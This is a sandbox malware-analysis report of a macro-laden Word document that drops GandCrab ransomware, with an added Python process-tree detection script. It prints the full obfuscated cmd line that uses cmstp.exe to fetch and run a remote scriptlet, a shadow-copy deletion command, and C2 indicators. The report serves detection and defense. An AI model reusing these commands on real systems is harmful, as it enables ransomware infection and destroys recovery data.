File name: dbcfe476b667d5cc6d01120f22948df71c99e318c71963cdb9f8c6bdeac595a5.doc

Full analysis: https://app.any.run/tasks/f2b56789-cfa7-4389-b1e4-04423c7cb587
Verdict: Malicious activity
Threats:

GandCrab is one of the most widely distributed ransomware families. Ransomware is malware that encrypts the victim's files and demands payment to restore access; without the attacker's key the files are generally unrecoverable.

Analysis date: March 21, 2019, 07:16:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
squiblydoo
ransomware
gandcrab
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Admin, Template: Normal, Last Saved By: Admin, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Jan 31 14:52:00 2019, Last Saved Time/Date: Wed Mar 20 07:20:00 2019, Number of Pages: 1, Number of Words: 4, Number of Characters: 23, Security: 0
MD5: 4D1EED5145007C8C6A4BDA03ED5CF9B0
SHA1: 9B3024B92B60C7044224BB3B9F15E86DD3BF5E05
SHA256: DBCFE476B667D5CC6D01120F22948DF71C99E318C71963CDB9F8C6BDEAC595A5
SSDEEP: 1536:dC/YRuBkL/o1uqyl9MUNCQu8YqFC0jI+koQ+a9:dCiuSZFW+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • SQUIBLYDOO was detected
      • cmstp.exe (PID: 3536)
    • Application was dropped or rewritten from another process
      • 32192.exe (PID: 2728)
    • Writes file to Word startup folder
      • 32192.exe (PID: 2728)
    • Actions look like stealing of personal data
      • 32192.exe (PID: 2728)
    • Dropped file may contain ransomware instructions
      • 32192.exe (PID: 2728)
    • Deletes shadow copies
      • cmd.exe (PID: 4088)
    • Renames files like ransomware
      • 32192.exe (PID: 2728)
    • Changes settings of System certificates
      • 32192.exe (PID: 2728)
    • Connects to CnC server
      • 32192.exe (PID: 2728)
    • GANDCRAB detected
      • 32192.exe (PID: 2728)
  • SUSPICIOUS
    • Creates files in the user directory
      • cmd.exe (PID: 2800)
      • cmstp.exe (PID: 3536)
      • 32192.exe (PID: 2728)
    • Executable content was dropped or overwritten
      • cmstp.exe (PID: 3536)
    • Creates files in the program directory
      • 32192.exe (PID: 2728)
    • Starts CMD.EXE for command execution
      • 32192.exe (PID: 2728)
    • Reads the cookies of Mozilla Firefox
      • 32192.exe (PID: 2728)
    • Adds / modifies Windows certificates
      • 32192.exe (PID: 2728)
  • INFO
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2304)
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2304)
    • Dropped object may contain Bitcoin addresses
      • 32192.exe (PID: 2728)
    • Dropped object may contain TOR URLs
      • 32192.exe (PID: 2728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Admin
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: Admin
RevisionNumber: 2
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2019:02:28 14:52:00
ModifyDate: 2019:03:20 07:20:00
Pages: 1
Words: 4
Characters: 23
Security: None
CodePage: Windows Latin 1 (Western European)
Company:
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 26
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
All screenshots are available in the full report
Total processes: 42
Monitored processes: 7
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Graph nodes, in order (edge types in the legend: start, drop and start): winword.exe (no specs), cmd.exe (no specs), cmstp.exe #SQUIBLYDOO, 32192.exe #GANDCRAB, cmd.exe, vssadmin.exe (no specs), vssvc.exe (no specs). Per the process table, the parent chain is cmd.exe (PID 2800, parent wmiprvse.exe) → cmstp.exe (3536) → 32192.exe (2728) → cmd.exe (4088) → vssadmin.exe (2640), with vssvc.exe (3280) started by services.exe. The WmiPrvSE parent, rather than WINWORD.EXE, is the pattern left by a macro that creates its child process through WMI (Win32_Process.Create) instead of Shell or CreateProcess.

Process information
PID 2304: WINWORD.EXE (parent: explorer.exe)
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dbcfe476b667d5cc6d01120f22948df71c99e318c71963cdb9f8c6bdeac595a5.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000
PID 2800: cmd.exe (parent: wmiprvse.exe)
CMD: cmd /V /C set "d3=s" && !d3!et "d85=\" && !d3!et "d73=e" && !d3!et "d8=i" && !d3!et "d92=A" && !d3!et "d6=N" && !d3!et "d65=d" && c!d92!ll !d3!et "d1=%!d92!PP!d65!!d92!T!d92!%" && c!d92!ll !d3!et "d31=%R!d92!!d6!!d65!OM%" && !d3!et "d75=!d1!!d85!M!d8!cro!d3!oft!d85!T!d73!mplat!d73!s!d85!!d31!.txt" && !d3!et "d35="^" && (For %i in ("[v!d73!r!d3!ion]" "!d3!ignatur!d73!=$Wi!d6!dow!d3! NT$" "[D!d73!faultIn!d3!tall_Singl!d73!U!d3!er]" "UnR!d73!gi!d3!t!d73!rOCXs=d69" "[d69]" "%11%\%d2_1%%d2_2%%d2_3%,NI,%d_1%%d_2%%d_3%%d_4%%d_5%%d_6%%d_7%%d_8%%d_9%%d_10%%d_11%%d_12%%d_13%%d_14%%d_15%%d_16%" "[!d3!tring!d3!]" "d_1=ht" "d_2=tp" "d_3=:/" "d_4=/p" "d_5=as" "d_6=te" "d_7=bi" "d_8=n." "d_9=co" "d_10=m/" "d_11=ra" "d_12=w/" "d_13=Vz" "d_14=FY" "d_15=iL" "d_16=W9" "d2_2=rO" "d2_1=sC" "d2_3=bJ" ) do @echo %~i)>"!d75!" && echo !d3!erv!d8!ceNam!d73!=!d35! !d35!>>!d75! && echo !d3!hortSvcN!d92!me=!d35! !d35!>>!d75! && c!d92!ll !d3!et "d0=%WI!d6!!d65!IR%" && !d3!t!d92!rt "" !d0!!d85!Sy!d3!t!d73!m32!d85!cm!d3!tp.!d73!x!d73! /s /ns "!d75!"
Path: C:\Windows\system32\cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID 3536: cmstp.exe (parent: cmd.exe) #SQUIBLYDOO
CMD: C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\13549.txt"
Path: C:\Windows\System32\cmstp.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Connection Manager Profile Installer
Exit code: 0
Version: 7.02.7600.16385 (win7_rtm.090713-1255)
PID 2728: 32192.exe (parent: cmstp.exe) #GANDCRAB
CMD: "C:\Users\admin\AppData\Roaming\Microsoft\32192.exe"
Path: C:\Users\admin\AppData\Roaming\Microsoft\32192.exe
User: admin
Integrity Level: MEDIUM
PID 4088: cmd.exe (parent: 32192.exe)
CMD: "C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
Path: C:\Windows\system32\cmd.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Command Processor
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
PID 2640: vssadmin.exe (parent: cmd.exe)
CMD: vssadmin delete shadows /all /quiet
Path: C:\Windows\system32\vssadmin.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID 3280: vssvc.exe (parent: services.exe)
CMD: C:\Windows\system32\vssvc.exe
Path: C:\Windows\system32\vssvc.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Microsoft® Volume Shadow Copy Service
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
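Two things in this table are worth checking for generically rather than by hash: cmd.exe (PID 2800) has wmiprvse.exe, not WINWORD.EXE, as its parent, so a detection keyed on "Word spawns a shell" misses the whole chain; and cmd.exe (PID 4088) runs as SYSTEM although its parent 32192.exe ran at MEDIUM integrity. The Python below is an added example (not part of the report or the sandbox) that encodes those two checks plus the cmstp.exe and vssadmin behaviour as simple rules over process-creation events. The event list is constructed from this table; parent PIDs the report does not list are left as None, and the long cmd.exe command line is truncated to its first statements.

```python
"""Process-tree checks for the behaviour in this report, run over events
reconstructed from its process table."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]   # None where the report does not list the parent's PID
    image: str
    parent_image: str
    cmdline: str
    integrity: str


# Constructed from the report's process table; the cmd.exe (PID 2800) command
# line is truncated to its first statements.
EVENTS = [
    Proc(2304, None, "WINWORD.EXE", "explorer.exe",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\dbcfe476b667d5cc6d01120f22948df71c99e318c71963cdb9f8c6bdeac595a5.doc"',
         "MEDIUM"),
    Proc(2800, None, "cmd.exe", "wmiprvse.exe",
         r'cmd /V /C set "d3=s" && !d3!et "d85=\" && !d3!et "d73=e" && !d3!et "d8=i" && !d3!et "d92=A" && !d3!et "d6=N" && !d3!et "d65=d" && c!d92!ll !d3!et "d1=%!d92!PP!d65!!d92!T!d92!%"',
         "MEDIUM"),
    Proc(3536, 2800, "cmstp.exe", "cmd.exe",
         r'C:\Windows\System32\cmstp.exe /s /ns "C:\Users\admin\AppData\Roaming\Microsoft\Templates\13549.txt"',
         "MEDIUM"),
    Proc(2728, 3536, "32192.exe", "cmstp.exe",
         r'"C:\Users\admin\AppData\Roaming\Microsoft\32192.exe"', "MEDIUM"),
    Proc(4088, 2728, "cmd.exe", "32192.exe",
         r'"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet', "SYSTEM"),
    Proc(2640, 4088, "vssadmin.exe", "cmd.exe", "vssadmin delete shadows /all /quiet", "SYSTEM"),
    Proc(3280, None, "vssvc.exe", "services.exe", r"C:\Windows\system32\vssvc.exe", "SYSTEM"),
]

INTEGRITY_RANK = {"LOW": 0, "MEDIUM": 1, "HIGH": 2, "SYSTEM": 3}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def run_rules(events: List[Proc]) -> List[Tuple[str, int]]:
    """Return (rule, pid) for every event that matches a rule."""
    by_pid = {p.pid: p for p in events}
    findings = []
    for p in events:
        img, parent, cmd = p.image.lower(), p.parent_image.lower(), p.cmdline.lower()
        # A macro calling Win32_Process.Create makes WmiPrvSE, not WINWORD, the parent.
        if img in SHELLS and parent == "wmiprvse.exe":
            findings.append(("wmi_spawned_shell", p.pid))
        # cmstp.exe silently (/s /ns) installing a profile from a user-writable path.
        if img == "cmstp.exe" and "/ns" in cmd and re.search(r"\\users\\", cmd):
            findings.append(("cmstp_user_writable_profile", p.pid))
        # cmstp.exe has no business being a parent; here it launched the dropped 32192.exe.
        if parent == "cmstp.exe":
            findings.append(("cmstp_child_process", p.pid))
        if re.search(r"vssadmin(\.exe)?\s+delete\s+shadows", cmd):
            findings.append(("shadow_copy_deletion", p.pid))
        # A child running at a higher integrity level than its parent.
        par = by_pid.get(p.ppid)
        if par is not None and INTEGRITY_RANK[p.integrity] > INTEGRITY_RANK[par.integrity]:
            findings.append(("integrity_jump", p.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in run_rules(EVENTS):
        print(f"{rule:30s} PID {pid}")
```

Run against the reconstructed events, the rules fire on PIDs 2800, 3536, 2728, 4088 (twice: shadow copy deletion and the MEDIUM to SYSTEM jump) and 2640, and stay quiet on WINWORD.EXE and vssvc.exe. The integrity check needs real parent PIDs (Sysmon event 1 or EDR telemetry carries them); parent image names alone are ambiguous here because two different cmd.exe instances appear in the chain.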
Total events: 1 299
Read events: 1 186
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 1
Suspicious files: 420
Text files: 323
Unknown types: 18

Dropped files

PID 2304 WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\CVR8E5C.tmp.cvr (hashes not listed)
PID 2304 WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\~DF81C564ABF038F732.TMP (hashes not listed)
PID 3536 cmstp.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt (text)
  MD5: 3FB643A8F59D29057DB772A7770C5217
  SHA256: 791E21E3D36F717B1D6CDB676D9A7E1C3F7F69D9EBF20CC8AFAB8AA7BC97E2C1
PID 3536 cmstp.exe: C:\Users\admin\AppData\Roaming\Microsoft\32192.exe (executable)
  MD5: 871386F3D3C5DA785D57D319C065EDC6
  SHA256: 6B26D8254F3DB2DD7F36A0AE393DAA75964F175478C2272E021CBA621A78F8AA
PID 2800 cmd.exe: C:\Users\admin\AppData\Roaming\Microsoft\Templates\13549.txt (ini)
  MD5: B7F95296C60B65E9462873C1A574C231
  SHA256: 0FAEF1780382198F845BBC7A22E64DCEA9E0CF52FBB10A2CFBA39CA8E8BF5971
PID 2304 WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm (pgc)
  MD5: 7AE6D6EAF471861752553ABA14261E5C
  SHA256: 157CD9D8E7B29FE7E097F8F5A4590364C82F2F85C6759D16C2805DB586B4DF9E
PID 2304 WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\~$cfe476b667d5cc6d01120f22948df71c99e318c71963cdb9f8c6bdeac595a5.doc (pgc)
  MD5: DCB6E7D083210EEFD8FCB7CB29AFE570
  SHA256: B0CFD32A608AD25B12112734586221E6E2D8119ECCDA84ACD37DA58B688415F0
PID 2728 32192.exe: C:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-500\ELQQM-MANUAL.txt (text)
  MD5: 4024D1C5A2ABB90B89BB917157B6C0C5
  SHA256: B93F243F817922B2F851ABCC28C638C66C4E0EE781A87B8CA717757DCA4C2E5A
PID 2728 32192.exe: C:\PerfLogs\ELQQM-MANUAL.txt (text)
  MD5: 4024D1C5A2ABB90B89BB917157B6C0C5
  SHA256: B93F243F817922B2F851ABCC28C638C66C4E0EE781A87B8CA717757DCA4C2E5A
PID 2728 32192.exe: C:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi (hashes not listed)
HTTP(S) requests: 2
TCP/UDP connections: 3
DNS requests: 2
Threats: 0

HTTP requests

PID 3536 cmstp.exe: GET http://pastebin.com/raw/VzFYiLW9 -> 200, from 104.20.209.21:80 (US), type xml, 206 Kb, reputation: shared
PID 2728 32192.exe: GET http://www.kakaocorp.link/ -> 301, from 107.173.49.208:80 (US), type html, 162 b, reputation: malicious

Connections

PID 3536 cmstp.exe -> 104.20.209.21:80 pastebin.com (Cloudflare Inc, US), reputation: shared
PID 2728 32192.exe -> 107.173.49.208:80 www.kakaocorp.link (ColoCrossing, US), reputation: malicious
PID 2728 32192.exe -> 107.173.49.208:443 www.kakaocorp.link (ColoCrossing, US), reputation: malicious

DNS requests

pastebin.com -> 104.20.209.21, 104.20.208.21 (reputation: shared)
www.kakaocorp.link -> 107.173.49.208 (reputation: malicious)

Threats

PID 3536 cmstp.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
PID 3536 cmstp.exe | A Network Trojan was detected | MALWARE [PTsecurity] Squiblydoo Scriptlet
PID 2728 32192.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server
PID 2728 32192.exe | A Network Trojan was detected | MALWARE [PTsecurity] Blacklisted GandCrab Ransomware C2 Server
PID 2728 32192.exe | A Network Trojan was detected | MALWARE [PTsecurity] GandCrab v.5 SSL Connection
3 ETPRO signatures available at the full report
No debug info